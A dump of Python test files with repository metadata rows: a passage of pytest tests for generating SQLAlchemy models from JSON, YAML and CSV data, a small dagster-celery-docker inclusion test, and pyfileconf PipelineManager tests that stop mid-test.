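    model = generate_model_from_dict(sample, tablename='example_table', primary_key='id')
    assert hasattr(model, 'to_json')
    return model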
@pytest.mark.parametrize('input_data, tablename, primary_key, serialization_config, skip_nested, default_to_str, type_mapping, base_model_attrs, expected_types, error', [
({'int1': 123,
'string1': 'test',
'float1': 123.45,
'bool1': True,
'datetime1': '2018-01-01T00:00:00.00000',
'date1': '2018-01-01',
'time1': datetime.utcnow().time().isoformat(),
'nested1': ['test', 'test2']
}, 'test_table0', 'int1', None, True, False, None, None, [('int1', Integer),
('string1', Text),
('float1', Float),
('bool1', Boolean),
('datetime1', DateTime),
('date1', Date),
('time1', Text)], None),
({'int1': 123,
'string1': 'test',
'float1': 123.45,
'bool1': True,
'datetime1': '2018-01-01T00:00:00.00000',
'date1': '2018-01-01',
'time1': datetime.utcnow().time().isoformat(),
'nested1': ['test', 'test2']
}, 'test_table1', 'int1', None, False, True, None, None, [('int1', Integer),
('string1', Text),
('float1', Float),
('bool1', Boolean),
('datetime1', DateTime),
('date1', Date),
('time1', Text),
('nested1', Text)], None),
({'int1': 123,
'string1': 'test',
'float1': 123.45,
'bool1': True,
'datetime1': '2018-01-01T00:00:00.00000',
'date1': '2018-01-01',
'time1': datetime.utcnow().time().isoformat(),
'nested1': ['test', 'test2']
}, 'test_table2', 'int1', None, False, False, None, None, [('int1', Integer),
('string1', Text),
('float1', Float),
('bool1', Boolean),
('datetime1', DateTime),
('date1', Date),
('time1', Text)], UnsupportedValueTypeError),
({'int1': 123,
'string1': 'test',
'float1': 123.45,
'bool1': True,
'datetime1': '2018-01-01T00:00:00.00000',
'date1': '2018-01-01',
'time1': datetime.utcnow().time().isoformat(),
'nested1': ['test', 'test2']
}, 'test_table3', 'int1', [AttributeConfiguration(name = 'bool1', supports_csv = False, supports_json = True, supports_yaml = True, supports_dict = True)],
True, False, None, None, [('int1', Integer),
('string1', Text),
('float1', Float),
('bool1', Boolean),
('datetime1', DateTime),
('date1', Date),
('time1', Text)], None),
({'int1': 123,
'string1': 'test',
'float1': 123.45,
'bool1': True,
'datetime1': '2018-01-01T00:00:00.00000',
'date1': '2018-01-01',
'time1': datetime.utcnow().time().isoformat(),
'nested1': ['test', 'test2']
}, 'test_table4', 'int1', None, True, False, {'float': Text}, None, [('int1', Integer),
('string1', Text),
('float1', Text),
('bool1', Boolean),
('datetime1', DateTime),
('date1', Date),
('time1', Text)], None),
({'int1': 123,
'string1': 'test',
'float1': 123.45,
'bool1': True,
'datetime1': '2018-01-01T00:00:00.00000',
'date1': '2018-01-01',
'time1': datetime.utcnow().time().isoformat(),
'nested1': ['test', 'test2']
}, 'test_table5', 'int1', None, True, False, None, {'test_attr': 123}, [('int1', Integer),
('string1', Text),
('float1', Float),
('bool1', Boolean),
('datetime1', DateTime),
('date1', Date),
('time1', Text)], None),
("JSON/input_json1.json", 'test_table6', 'test', None, True, False, None, None, [('test', Integer),
('second_test', Text)], None),
("JSON/input_json2.json", 'test_table7', 'test', None, True, False, None, None, [('test', Integer),
('second_test', Text)], None),
("JSON/update_from_json1.json", 'test_table8', 'id', None, True, False, None, None, [('id', Integer),
('name', Text),
('hybrid_value', Text)], None),
("JSON/update_from_json2.json", 'test_table9', 'id', None, True, False, None, None, [('id', Integer),
('name', Text),
('hybrid_value', Text)], None),
("JSON/update_from_json3.json", 'test_table10', 'id', None, True, False, None, None, [('id', Integer),
('name', Text),
('hybrid_value', Text)], ValueError),
])
def test_generate_model_from_json(input_files,
input_data,
tablename,
primary_key,
serialization_config,
skip_nested,
default_to_str,
type_mapping,
base_model_attrs,
expected_types,
error):
# pylint: disable=no-member,line-too-long
input_data = check_input_file(input_files, input_data)
if not checkers.is_file(input_data):
input_data = json.dumps(input_data)
if error:
with pytest.raises(error):
result = generate_model_from_json(input_data,
tablename = tablename,
primary_key = primary_key,
serialization_config = serialization_config,
skip_nested = skip_nested,
default_to_str = default_to_str,
type_mapping = type_mapping,
base_model_attrs = base_model_attrs)
else:
result = generate_model_from_json(input_data,
tablename = tablename,
primary_key = primary_key,
serialization_config = serialization_config,
skip_nested = skip_nested,
default_to_str = default_to_str,
type_mapping = type_mapping,
base_model_attrs = base_model_attrs)
assert hasattr(result, 'to_json') is True
assert hasattr(result, 'new_from_json') is True
assert hasattr(result, 'update_from_json') is True
assert hasattr(result, '__serialization__') is True
assert result.__tablename__ == tablename
for item in expected_types:
assert hasattr(result, item[0]) is True
attribute = getattr(result, item[0], None)
assert isinstance(attribute.type, item[1]) is True
if serialization_config:
for item in serialization_config:
assert hasattr(result, item.name) is True
assert result.get_attribute_serialization_config(item.name) == item
else:
for item in expected_types:
assert hasattr(result, item[0]) is True
assert result.get_attribute_serialization_config(item[0]).supports_csv == (True, True)
assert result.get_attribute_serialization_config(item[0]).supports_json == (True, True)
assert result.get_attribute_serialization_config(item[0]).supports_yaml == (True, True)
assert result.get_attribute_serialization_config(item[0]).supports_dict == (True, True)
if base_model_attrs:
for key in base_model_attrs:
assert hasattr(result, key) is True
assert getattr(result, key) == base_model_attrs[key]
@pytest.mark.parametrize('input_data, tablename, primary_key, serialization_config, skip_nested, default_to_str, type_mapping, base_model_attrs, expected_types, error', [
({'int1': 123,
'string1': 'test',
'float1': 123.45,
'bool1': True,
'datetime1': '2018-01-01T00:00:00.00000',
'date1': '2018-01-01',
'time1': datetime.utcnow().time().isoformat(),
'nested1': ['test', 'test2']
}, 'test_table0', 'int1', None, True, False, None, None, [('int1', Integer),
('string1', Text),
('float1', Float),
('bool1', Boolean),
('datetime1', DateTime),
('date1', Date),
('time1', Text)], None),
({'int1': 123,
'string1': 'test',
'float1': 123.45,
'bool1': True,
'datetime1': '2018-01-01T00:00:00.00000',
'date1': '2018-01-01',
'time1': datetime.utcnow().time().isoformat(),
'nested1': ['test', 'test2']
}, 'test_table1', 'int1', None, False, True, None, None, [('int1', Integer),
('string1', Text),
('float1', Float),
('bool1', Boolean),
('datetime1', DateTime),
('date1', Date),
('time1', Text),
('nested1', Text)], None),
({'int1': 123,
'string1': 'test',
'float1': 123.45,
'bool1': True,
'datetime1': '2018-01-01T00:00:00.00000',
'date1': '2018-01-01',
'time1': datetime.utcnow().time().isoformat(),
'nested1': ['test', 'test2']
}, 'test_table2', 'int1', None, False, False, None, None, [('int1', Integer),
('string1', Text),
('float1', Float),
('bool1', Boolean),
('datetime1', DateTime),
('date1', Date),
('time1', Text)], UnsupportedValueTypeError),
({'int1': 123,
'string1': 'test',
'float1': 123.45,
'bool1': True,
'datetime1': '2018-01-01T00:00:00.00000',
'date1': '2018-01-01',
'time1': datetime.utcnow().time().isoformat(),
'nested1': ['test', 'test2']
}, 'test_table3', 'int1', [AttributeConfiguration(name = 'bool1', supports_csv = False, supports_json = True, supports_yaml = True, supports_dict = True)],
True, False, None, None, [('int1', Integer),
('string1', Text),
('float1', Float),
('bool1', Boolean),
('datetime1', DateTime),
('date1', Date),
('time1', Text)], None),
({'int1': 123,
'string1': 'test',
'float1': 123.45,
'bool1': True,
'datetime1': '2018-01-01T00:00:00.00000',
'date1': '2018-01-01',
'time1': datetime.utcnow().time().isoformat(),
'nested1': ['test', 'test2']
}, 'test_table4', 'int1', None, True, False, {'float': Text}, None, [('int1', Integer),
('string1', Text),
('float1', Text),
('bool1', Boolean),
('datetime1', DateTime),
('date1', Date),
('time1', Text)], None),
({'int1': 123,
'string1': 'test',
'float1': 123.45,
'bool1': True,
'datetime1': '2018-01-01T00:00:00.00000',
'date1': '2018-01-01',
'time1': datetime.utcnow().time().isoformat(),
'nested1': ['test', 'test2']
}, 'test_table5', 'int1', None, True, False, None, {'test_attr': 123}, [('int1', Integer),
('string1', Text),
('float1', Float),
('bool1', Boolean),
('datetime1', DateTime),
('date1', Date),
('time1', Text)], None),
("JSON/input_json1.json", 'test_table6', 'test', None, True, False, None, None, [('test', Integer),
('second_test', Text)], None),
("JSON/input_json2.json", 'test_table7', 'test', None, True, False, None, None, [('test', Integer),
('second_test', Text)], None),
("JSON/update_from_json1.json", 'test_table8', 'id', None, True, False, None, None, [('id', Integer),
('name', Text),
('hybrid_value', Text)], None),
("JSON/update_from_json2.json", 'test_table9', 'id', None, True, False, None, None, [('id', Integer),
('name', Text),
('hybrid_value', Text)], None),
("JSON/update_from_json3.json", 'test_table10', 'id', None, True, False, None, None, [('id', Integer),
('name', Text),
('hybrid_value', Text)], ValueError),
])
def test_generate_model_from_yaml(input_files,
input_data,
tablename,
primary_key,
serialization_config,
skip_nested,
default_to_str,
type_mapping,
base_model_attrs,
expected_types,
error):
# pylint: disable=no-member,line-too-long
input_data = check_input_file(input_files, input_data)
if not checkers.is_file(input_data):
input_data = yaml.dump(input_data)
if error:
with pytest.raises(error):
result = generate_model_from_yaml(input_data,
tablename = tablename,
primary_key = primary_key,
serialization_config = serialization_config,
skip_nested = skip_nested,
default_to_str = default_to_str,
type_mapping = type_mapping,
base_model_attrs = base_model_attrs)
else:
result = generate_model_from_yaml(input_data,
tablename = tablename,
primary_key = primary_key,
serialization_config = serialization_config,
skip_nested = skip_nested,
default_to_str = default_to_str,
type_mapping = type_mapping,
base_model_attrs = base_model_attrs)
assert hasattr(result, 'to_json') is True
assert hasattr(result, 'new_from_json') is True
assert hasattr(result, 'update_from_json') is True
assert hasattr(result, '__serialization__') is True
assert result.__tablename__ == tablename
for item in expected_types:
assert hasattr(result, item[0]) is True
attribute = getattr(result, item[0], None)
assert isinstance(attribute.type, item[1]) is True
if serialization_config:
for item in serialization_config:
assert hasattr(result, item.name) is True
assert result.get_attribute_serialization_config(item.name) == item
else:
for item in expected_types:
assert hasattr(result, item[0]) is True
assert result.get_attribute_serialization_config(item[0]).supports_csv == (True, True)
assert result.get_attribute_serialization_config(item[0]).supports_json == (True, True)
assert result.get_attribute_serialization_config(item[0]).supports_yaml == (True, True)
assert result.get_attribute_serialization_config(item[0]).supports_dict == (True, True)
if base_model_attrs:
for key in base_model_attrs:
assert hasattr(result, key) is True
assert getattr(result, key) == base_model_attrs[key]
@pytest.mark.parametrize('input_data, tablename, primary_key, serialization_config, skip_nested, default_to_str, type_mapping, base_model_attrs, expected_types, error', [
(["int1|string1|float1|bool1|datetime1|date1|time1|nested1",
"123|test|123.45|True|2018-01-01T00:00:00.00000|2018-01-01|2018-01-01T00:00:00.00000|['test','test2']"],
'test_table0', 'int1', None, True, False, None, None, [('int1', Integer),
('string1', Text),
('float1', Float),
('bool1', Text),
('datetime1', DateTime),
('date1', Date),
('time1', DateTime)], None),
("CSV/update_from_csv1.csv", 'test_table1', 'id', None, True, False, None, None, [('id', Integer),
('name', Text),
('password', Text),
('smallint_column', Integer),
('hybrid_value', Integer)], CSVStructureError),
("CSV/update_from_csv2.csv", 'test_table2', 'id', None, True, False, None, None, [('id', Integer),
('name', Text),
('password', Text),
('smallint_column', Integer),
('hybrid_value', Integer)], CSVStructureError),
("CSV/update_from_csv3.csv", 'test_table3', 'id', None, True, False, None, None, [('id', Integer),
('name', Text),
('password', Text),
('smallint_column', Integer),
('hybrid_value', Integer)], None),
])
def test_generate_model_from_csv(input_files,
input_data,
tablename,
primary_key,
serialization_config,
skip_nested,
default_to_str,
type_mapping,
base_model_attrs,
expected_types,
error):
# pylint: disable=no-member,line-too-long
input_data = check_input_file(input_files, input_data)
if error:
with pytest.raises(error):
result = generate_model_from_csv(input_data,
tablename = tablename,
primary_key = primary_key,
serialization_config = serialization_config,
skip_nested = skip_nested,
default_to_str = default_to_str,
type_mapping = type_mapping,
base_model_attrs = base_model_attrs)
else:
result = generate_model_from_csv(input_data,
tablename = tablename,
primary_key = primary_key,
serialization_config = serialization_config,
skip_nested = skip_nested,
default_to_str = default_to_str,
type_mapping = type_mapping,
base_model_attrs = base_model_attrs)
assert hasattr(result, 'to_json') is True
assert hasattr(result, 'new_from_json') is True
assert hasattr(result, 'update_from_json') is True
assert hasattr(result, '__serialization__') is True
assert result.__tablename__ == tablename
for item in expected_types:
assert hasattr(result, item[0]) is True
attribute = getattr(result, item[0], None)
assert isinstance(attribute.type, item[1]) is True
if serialization_config:
for item in serialization_config:
assert hasattr(result, item.name) is True
assert result.get_attribute_serialization_config(item.name) == item
else:
for item in expected_types:
assert hasattr(result, item[0]) is True
assert result.get_attribute_serialization_config(item[0]).supports_csv == (True, True)
assert result.get_attribute_serialization_config(item[0]).supports_json == (True, True)
assert result.get_attribute_serialization_config(item[0]).supports_yaml == (True, True)
assert result.get_attribute_serialization_config(item[0]).supports_dict == (True, True)
if base_model_attrs:
for key in base_model_attrs:
assert hasattr(result, key) is True
assert getattr(result, key) == base_model_attrs[key]
| 56.292758 | 170 | 0.396015 | 2,722 | 36,534 | 5.110948 | 0.054004 | 0.071018 | 0.036228 | 0.019623 | 0.946377 | 0.941633 | 0.936242 | 0.934733 | 0.934733 | 0.934733 | 0 | 0.062432 | 0.49625 | 36,534 | 648 | 171 | 56.37963 | 0.693491 | 0.010538 | 0 | 0.938462 | 1 | 0.001709 | 0.131147 | 0.02856 | 0 | 0 | 0 | 0 | 0.109402 | 1 | 0.008547 | false | 0.006838 | 0.017094 | 0 | 0.025641 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
675ff094d64ff262de3fb00140a05c53e9add991 | 206 | py | Python | python_modules/libraries/dagster-celery-docker/dagster_celery_docker_tests/test_inclusion.py | dbatten5/dagster | d76e50295054ffe5a72f9b292ef57febae499528 | [
"Apache-2.0"
] | 4,606 | 2018-06-21T17:45:20.000Z | 2022-03-31T23:39:42.000Z | python_modules/libraries/dagster-celery-docker/dagster_celery_docker_tests/test_inclusion.py | dbatten5/dagster | d76e50295054ffe5a72f9b292ef57febae499528 | [
"Apache-2.0"
] | 6,221 | 2018-06-12T04:36:01.000Z | 2022-03-31T21:43:05.000Z | python_modules/libraries/dagster-celery-docker/dagster_celery_docker_tests/test_inclusion.py | dbatten5/dagster | d76e50295054ffe5a72f9b292ef57febae499528 | [
"Apache-2.0"
] | 619 | 2018-08-22T22:43:09.000Z | 2022-03-31T22:48:06.000Z | from dagster import ExecutorDefinition
from dagster_celery_docker import celery_docker_executor
def test_dagster_celery_docker_include():
assert isinstance(celery_docker_executor, ExecutorDefinition)
| 29.428571 | 65 | 0.878641 | 24 | 206 | 7.125 | 0.5 | 0.280702 | 0.222222 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.092233 | 206 | 6 | 66 | 34.333333 | 0.914439 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.25 | 1 | 0.25 | true | 0 | 0.5 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
678542ab1f1edb8fd028957265c341dfde1c2b3b | 21,189 | py | Python | tests/test_pipeline_manager/test_get.py | nickderobertis/py-file-conf | 100773b86373035a5b485a1ed96d8f5a1d69d066 | [
"MIT"
] | 2 | 2020-11-29T19:09:14.000Z | 2021-09-11T19:21:21.000Z | tests/test_pipeline_manager/test_get.py | nickderobertis/py-file-conf | 100773b86373035a5b485a1ed96d8f5a1d69d066 | [
"MIT"
] | 47 | 2020-02-01T03:54:07.000Z | 2022-01-13T02:24:45.000Z | tests/test_pipeline_manager/test_get.py | nickderobertis/py-file-conf | 100773b86373035a5b485a1ed96d8f5a1d69d066 | [
"MIT"
] | null | null | null | from copy import deepcopy
from pyfileconf import Selector
from tests.input_files.mypackage.cmodule import ExampleClass
from tests.test_pipeline_manager.base import PipelineManagerTestBase, CLASS_CONFIG_DICT_LIST
class TestPipelineManagerGetOne(PipelineManagerTestBase):
def test_get_function(self):
self.write_a_function_to_pipeline_dict_file()
pipeline_manager = self.create_pm()
pipeline_manager.load()
sel = Selector()
iv = sel.test_pipeline_manager.stuff.a_function
iv_func = pipeline_manager.get(iv)
iv_result = iv_func()
str_func = pipeline_manager.get('stuff.a_function')
str_result = str_func()
assert iv_func is str_func is iv.item
assert iv_result == str_result == (None, None)
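# PipelineManager.get accepts either the Selector item itself or its dotted
# section path as a string; both resolve to the same underlying object.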
def test_get_function_multiple_pms(self):
self.write_a_function_to_pipeline_dict_file()
self.write_a_function_to_pipeline_dict_file(file_path=self.second_pipeline_dict_path)
pipeline_manager = self.create_pm()
pipeline_manager.load()
pipeline_manager2 = self.create_pm(
folder=self.second_pm_folder,
name=self.second_test_name,
)
pipeline_manager2.load()
sel = Selector()
# Get from pipeline manager 1
iv = sel.test_pipeline_manager.stuff.a_function
iv_func = pipeline_manager.get(iv)
iv_result = iv_func()
str_func = pipeline_manager.get('stuff.a_function')
str_result = str_func()
assert iv_result == str_result == (None, None)
# Get from pipeline manager 2
iv = sel.test_pipeline_manager2.stuff.a_function
iv_func = pipeline_manager2.get(iv)
iv_result = iv_func()
str_func = pipeline_manager2.get('stuff.a_function')
str_result = str_func()
assert iv_result == str_result == (None, None)
def test_get_class(self):
self.write_example_class_to_pipeline_dict_file()
pipeline_manager = self.create_pm()
pipeline_manager.load()
sel = Selector()
iv = sel.test_pipeline_manager.stuff.ExampleClass
iv_obj = pipeline_manager.get(iv)
str_obj = pipeline_manager.get('stuff.ExampleClass')
assert iv_obj is str_obj is iv()
assert iv_obj == ExampleClass(None)
def test_get_class_multiple_pms(self):
self.write_example_class_to_pipeline_dict_file()
self.write_example_class_to_pipeline_dict_file(file_path=self.second_pipeline_dict_path)
pipeline_manager = self.create_pm()
pipeline_manager.load()
pipeline_manager2 = self.create_pm(
folder=self.second_pm_folder,
name=self.second_test_name,
)
pipeline_manager2.load()
sel = Selector()
# Get from pipeline manager 1
iv = sel.test_pipeline_manager.stuff.ExampleClass
iv_obj = pipeline_manager.get(iv)
str_obj = pipeline_manager.get('stuff.ExampleClass')
assert iv_obj is str_obj is iv()
assert iv_obj == ExampleClass(None)
# Get from pipeline manager 2
iv = sel.test_pipeline_manager2.stuff.ExampleClass
iv_obj = pipeline_manager2.get(iv)
str_obj = pipeline_manager2.get('stuff.ExampleClass')
assert iv_obj is str_obj is iv()
assert iv_obj == ExampleClass(None)
def test_get_class_from_specific_config_dict(self):
self.write_example_class_dict_to_file()
pipeline_manager = self.create_pm(
specific_class_config_dicts=CLASS_CONFIG_DICT_LIST
)
pipeline_manager.load()
sel = Selector()
iv = sel.test_pipeline_manager.example_class.stuff.data
expect_ec = ExampleClass(None, name='data')
iv_obj = pipeline_manager.get(iv)
str_obj = pipeline_manager.get('example_class.stuff.data')
assert iv_obj is str_obj is iv.item
assert iv_obj.name == str_obj.name == expect_ec.name
assert iv_obj.a == str_obj.a == expect_ec.a
def test_get_class_from_specific_config_dict_custom_name(self):
self.write_example_class_dict_to_file()
pipeline_manager = self.create_pm(
specific_class_config_dicts=CLASS_CONFIG_DICT_LIST
)
pipeline_manager.load()
self.append_to_specific_class_config('name: str = "My Name"')
pipeline_manager.reload()
sel = Selector()
iv = sel.test_pipeline_manager.example_class.stuff.data
expect_ec = ExampleClass(None, name='My Name')
iv_obj = pipeline_manager.get(iv)
str_obj = pipeline_manager.get('example_class.stuff.data')
assert iv_obj is str_obj is iv.item
assert iv_obj.name == str_obj.name == expect_ec.name
assert iv_obj.a == str_obj.a == expect_ec.a
def test_get_class_from_specific_config_dict_custom_key_attr_and_key(self):
self.write_example_class_dict_to_file()
ccdl = deepcopy(CLASS_CONFIG_DICT_LIST)
for cd in ccdl:
cd['key_attr'] = 'c'
pipeline_manager = self.create_pm(
specific_class_config_dicts=ccdl
)
pipeline_manager.load()
self.append_to_specific_class_config('c: str = "My Name"')
pipeline_manager.reload()
sel = Selector()
iv = sel.test_pipeline_manager.example_class.stuff.data
expect_ec = ExampleClass(None, c='My Name', name=None)
iv_obj = pipeline_manager.get(iv)
str_obj = pipeline_manager.get('example_class.stuff.data')
assert iv_obj is str_obj is iv.item
assert iv_obj.c == str_obj.c == expect_ec.c
assert iv_obj.a == str_obj.a == expect_ec.a
def test_get_class_from_specific_config_dict_multiple_pms(self):
self.write_example_class_dict_to_file()
self.write_example_class_dict_to_file(pm_index=1)
pipeline_manager = self.create_pm(
specific_class_config_dicts=CLASS_CONFIG_DICT_LIST
)
pipeline_manager.load()
pipeline_manager2 = self.create_pm(
folder=self.second_pm_folder,
name=self.second_test_name,
specific_class_config_dicts=CLASS_CONFIG_DICT_LIST,
)
pipeline_manager2.load()
sel = Selector()
# Get from pipeline manager 1
iv = sel.test_pipeline_manager.example_class.stuff.data
expect_ec = ExampleClass(None, name='data')
iv_obj = pipeline_manager.get(iv)
str_obj = pipeline_manager.get('example_class.stuff.data')
assert iv_obj.name == str_obj.name == expect_ec.name
assert iv_obj.a == str_obj.a == expect_ec.a
# Get from pipeline manager 2
iv = sel.test_pipeline_manager2.example_class.stuff.data
expect_ec = ExampleClass(None, name='data')
iv_obj = pipeline_manager2.get(iv)
str_obj = pipeline_manager2.get('example_class.stuff.data')
assert iv_obj.name == str_obj.name == expect_ec.name
assert iv_obj.a == str_obj.a == expect_ec.a
def test_consistent_specific_config_obj(self):
self.write_example_class_dict_to_file()
pipeline_manager = self.create_pm(
specific_class_config_dicts=CLASS_CONFIG_DICT_LIST
)
pipeline_manager.load()
sel = Selector()
iv = sel.test_pipeline_manager.example_class.stuff.data
iv_obj = pipeline_manager.get(iv)
str_obj = pipeline_manager.get('example_class.stuff.data')
assert iv.item is iv_obj is str_obj
def test_get_class_from_specific_config_dict_access_property_that_needs_obj_loaded(self):
self.write_example_class_dict_to_file()
pipeline_manager = self.create_pm(
specific_class_config_dicts=CLASS_CONFIG_DICT_LIST
)
pipeline_manager.load()
sel = Selector()
iv = sel.test_pipeline_manager.example_class.stuff.data
pipeline_manager.update(
a=(1, 2),
section_path_str='example_class.stuff.data'
)
iv_obj = pipeline_manager.get(iv)
str_obj = pipeline_manager.get('example_class.stuff.data')
assert iv.e == iv_obj.e == str_obj.e == 10
class TestPipelineManagerGetSection(PipelineManagerTestBase):
def test_get_main_dict_section(self):
self.write_a_function_to_pipeline_dict_file()
pipeline_manager = self.create_pm()
pipeline_manager.load()
sel = Selector()
iv = sel.test_pipeline_manager.stuff
iv_section = pipeline_manager.get(iv)
iv_func = iv_section[0]
iv_result = iv_func()
str_section = pipeline_manager.get('stuff')
str_func = str_section[0]
str_result = str_func()
direct_iv_func = iv.a_function.item
direct_str_func = pipeline_manager.get('stuff.a_function')
assert iv_func is str_func is direct_iv_func is direct_str_func
assert iv_result == str_result == (None, None)
def test_get_main_dict_section_multiple_pms(self):
self.write_a_function_to_pipeline_dict_file()
self.write_a_function_to_pipeline_dict_file(file_path=self.second_pipeline_dict_path)
pipeline_manager = self.create_pm()
pipeline_manager.load()
pipeline_manager2 = self.create_pm(
folder=self.second_pm_folder,
name=self.second_test_name,
)
pipeline_manager2.load()
sel = Selector()
# Get pipeline manager 1 section
iv = sel.test_pipeline_manager.stuff
iv_section = pipeline_manager.get(iv)
iv_func = iv_section[0]
iv_result = iv_func()
str_section = pipeline_manager.get('stuff')
str_func = str_section[0]
str_result = str_func()
assert iv_result == str_result == (None, None)
# Get pipeline manager 2 section
iv = sel.test_pipeline_manager2.stuff
iv_section = pipeline_manager2.get(iv)
iv_func = iv_section[0]
iv_result = iv_func()
str_section = pipeline_manager2.get('stuff')
str_func = str_section[0]
str_result = str_func()
assert iv_result == str_result == (None, None)
def test_get_main_dict_nested_section(self):
self.write_a_function_to_pipeline_dict_file(nest_section=True)
pipeline_manager = self.create_pm()
pipeline_manager.load()
sel = Selector()
iv = sel.test_pipeline_manager.my_section
iv_section = pipeline_manager.get(iv)
iv_func = iv_section['stuff'][0]
iv_result = iv_func()
str_section = pipeline_manager.get('my_section')
str_func = str_section['stuff'][0]
str_result = str_func()
assert iv_result == str_result == (None, None)
def test_get_specific_class_dict_section(self):
self.write_example_class_dict_to_file()
pipeline_manager = self.create_pm(
specific_class_config_dicts=CLASS_CONFIG_DICT_LIST
)
pipeline_manager.load()
sel = Selector()
iv = sel.test_pipeline_manager.example_class.stuff
expect_ec = ExampleClass(None, name='data')
iv_section = pipeline_manager.get(iv)
iv_obj = iv_section[0]
str_section = pipeline_manager.get('example_class.stuff')
str_obj = str_section[0]
assert iv_obj.name == str_obj.name == expect_ec.name
assert iv_obj.a == str_obj.a == expect_ec.a
def test_get_specific_class_dict_section_custom_name(self):
self.write_example_class_dict_to_file()
pipeline_manager = self.create_pm(
specific_class_config_dicts=CLASS_CONFIG_DICT_LIST
)
pipeline_manager.load()
self.append_to_specific_class_config('name: str = "My Name"')
pipeline_manager.reload()
sel = Selector()
iv = sel.test_pipeline_manager.example_class.stuff
expect_ec = ExampleClass(None, name='My Name')
iv_section = pipeline_manager.get(iv)
iv_obj = iv_section[0]
str_section = pipeline_manager.get('example_class.stuff')
str_obj = str_section[0]
assert iv_obj.name == str_obj.name == expect_ec.name
assert iv_obj.a == str_obj.a == expect_ec.a
def test_get_specific_class_dict_section_custom_key_attr_and_key(self):
self.write_example_class_dict_to_file()
ccdl = deepcopy(CLASS_CONFIG_DICT_LIST)
for cd in ccdl:
cd['key_attr'] = 'c'
pipeline_manager = self.create_pm(
specific_class_config_dicts=ccdl
)
pipeline_manager.load()
self.append_to_specific_class_config('c: str = "My Name"')
pipeline_manager.reload()
sel = Selector()
iv = sel.test_pipeline_manager.example_class.stuff
expect_ec = ExampleClass(None, c='My Name', name=None)
iv_section = pipeline_manager.get(iv)
iv_obj = iv_section[0]
str_section = pipeline_manager.get('example_class.stuff')
str_obj = str_section[0]
direct_iv_obj = pipeline_manager.get(iv.data)
direct_str_obj = pipeline_manager.get('example_class.stuff.data')
assert iv_obj is str_obj is direct_iv_obj is direct_str_obj
assert iv_obj.c == str_obj.c == expect_ec.c
assert iv_obj.a == str_obj.a == expect_ec.a
def test_get_specific_class_dict_section_multiple_pms(self):
self.write_example_class_dict_to_file()
self.write_example_class_dict_to_file(pm_index=1)
pipeline_manager = self.create_pm(
specific_class_config_dicts=CLASS_CONFIG_DICT_LIST
)
pipeline_manager.load()
pipeline_manager2 = self.create_pm(
folder=self.second_pm_folder,
name=self.second_test_name,
specific_class_config_dicts=CLASS_CONFIG_DICT_LIST,
)
pipeline_manager2.load()
sel = Selector()
# Get pipeline manager 1 section
iv = sel.test_pipeline_manager.example_class.stuff
expect_ec = ExampleClass(None, name='data')
iv_section = pipeline_manager.get(iv)
iv_obj = iv_section[0]
str_section = pipeline_manager.get('example_class.stuff')
str_obj = str_section[0]
assert iv_obj.name == str_obj.name == expect_ec.name
assert iv_obj.a == str_obj.a == expect_ec.a
# Get pipeline manager 2 section
iv = sel.test_pipeline_manager2.example_class.stuff
expect_ec = ExampleClass(None, name='data')
iv_section = pipeline_manager2.get(iv)
iv_obj = iv_section[0]
str_section = pipeline_manager2.get('example_class.stuff')
str_obj = str_section[0]
assert iv_obj.name == str_obj.name == expect_ec.name
assert iv_obj.a == str_obj.a == expect_ec.a
def test_get_specific_class_dict_nested_section(self):
self.write_example_class_dict_to_file(nest_section=True)
pipeline_manager = self.create_pm(
specific_class_config_dicts=CLASS_CONFIG_DICT_LIST
)
pipeline_manager.load()
sel = Selector()
iv = sel.test_pipeline_manager.example_class
expect_ec = ExampleClass(None, name='data')
iv_section = pipeline_manager.get(iv)
iv_obj = iv_section['my_section']['stuff'][0]
str_section = pipeline_manager.get('example_class')
str_obj = str_section['my_section']['stuff'][0]
assert iv_obj.name == str_obj.name == expect_ec.name
assert iv_obj.a == str_obj.a == expect_ec.a
def test_get_specific_class_dict_custom_key_attr_section(self):
self.write_example_class_dict_to_file()
class_config_dict_list = deepcopy(CLASS_CONFIG_DICT_LIST)
class_config_dict_list[0].update(
key_attr='a'
)
pipeline_manager = self.create_pm(
specific_class_config_dicts=class_config_dict_list
)
pipeline_manager.load()
sel = Selector()
iv = sel.test_pipeline_manager.example_class.stuff
expect_ec = ExampleClass(a='data')
iv_section = pipeline_manager.get(iv)
iv_obj = iv_section[0]
str_section = pipeline_manager.get('example_class.stuff')
str_obj = str_section[0]
assert iv_obj.name == str_obj.name == expect_ec.name
assert iv_obj.a == str_obj.a == expect_ec.a
class TestGetSectionPathFromItem(PipelineManagerTestBase):
def test_get_function_section_path(self):
self.write_a_function_to_pipeline_dict_file()
pipeline_manager = self.create_pm()
pipeline_manager.load()
sel = Selector()
iv = sel.test_pipeline_manager.stuff.a_function
iv_run = iv() # result of a_function(), should not have _section_path_str
assert not hasattr(iv_run, '_section_path_str')
iv_func = pipeline_manager.get(iv)
str_func = pipeline_manager.get('stuff.a_function')
for obj in [iv, iv_func, str_func]:
sp = obj._section_path_str
assert sp == 'test_pipeline_manager.stuff.a_function'
def test_get_function_section_path_by_section(self):
self.write_a_function_to_pipeline_dict_file()
pipeline_manager = self.create_pm()
pipeline_manager.load()
sel = Selector()
iv = sel.test_pipeline_manager.stuff
iv_func = pipeline_manager.get(iv)
str_func = pipeline_manager.get('stuff')
assert iv._section_path_str == 'test_pipeline_manager.stuff'
for obj_list in [iv_func, str_func]:
for obj in obj_list:
sp = obj._section_path_str
assert sp == 'test_pipeline_manager.stuff.a_function'
def test_get_class_section_path(self):
self.write_example_class_to_pipeline_dict_file()
pipeline_manager = self.create_pm()
pipeline_manager.load()
sel = Selector()
iv = sel.test_pipeline_manager.stuff.ExampleClass
        iv_run = iv()  # calling the general class returns an instance, which should have _section_path_str
